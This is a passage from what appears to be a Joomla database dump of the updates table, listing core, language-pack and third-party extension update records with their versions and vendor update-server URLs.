',''),(8213,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8214,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(8215,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8216,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8217,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8218,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8219,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8220,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8221,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8222,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8223,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8224,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8225,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8226,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8227,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8228,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8229,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8230,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8231,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8232,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8233,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8234,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8235,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8236,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8237,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8238,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8239,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8240,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8241,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8242,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8243,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8244,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8245,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8246,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8247,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8248,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8249,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8250,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8251,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8252,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8253,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8254,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8255,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8256,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8257,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8258,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8259,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8260,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8261,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(8262,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(8263,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(8264,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(8265,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(8266,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(8267,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(8268,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(8269,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8270,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8271,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8272,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8273,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8274,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8275,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8276,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8277,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8278,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8279,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8280,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8281,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8282,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8283,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8284,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8285,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8286,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8287,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8288,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8289,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8290,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8291,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8292,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8293,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8294,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8295,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8296,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8297,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8298,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8299,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8300,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8301,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8302,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8303,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8304,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8305,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8306,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8307,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8308,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8309,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8310,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8311,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8312,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8313,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8314,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(8315,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(8316,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.0','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-0.html			\n		',''),(8317,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8318,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8319,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8320,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8321,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8322,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(8323,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8324,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8325,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8326,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8327,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8328,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8329,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8330,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8331,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8332,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8333,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8334,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8335,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8336,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8337,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8338,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8339,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8340,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8341,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8342,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8343,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8344,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8345,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8346,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8347,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8348,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8349,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8350,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8351,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8352,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8353,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8354,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8355,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8356,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8357,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8358,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8359,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8360,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8361,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8362,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8363,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8364,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8365,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8366,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8367,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8368,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8369,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(8370,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(8371,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(8372,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(8373,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(8374,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(8375,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(8376,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(8377,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8378,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8379,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8380,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8381,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8382,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8383,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8384,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8385,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8386,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8387,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8388,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8389,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8390,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8391,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8392,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8393,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8394,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8395,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8396,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8397,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8398,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8399,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8400,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8401,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8402,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8403,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8404,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8405,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8406,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8407,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8408,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8409,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8410,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8411,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8412,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8413,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8414,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8415,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8416,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8417,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8418,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8419,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8420,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8421,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8422,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(8423,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(8424,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.0','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-0.html			\n		',''),(8425,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8426,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8427,67,0,'Akeeba Backup Core package','Akeeba Backup Core 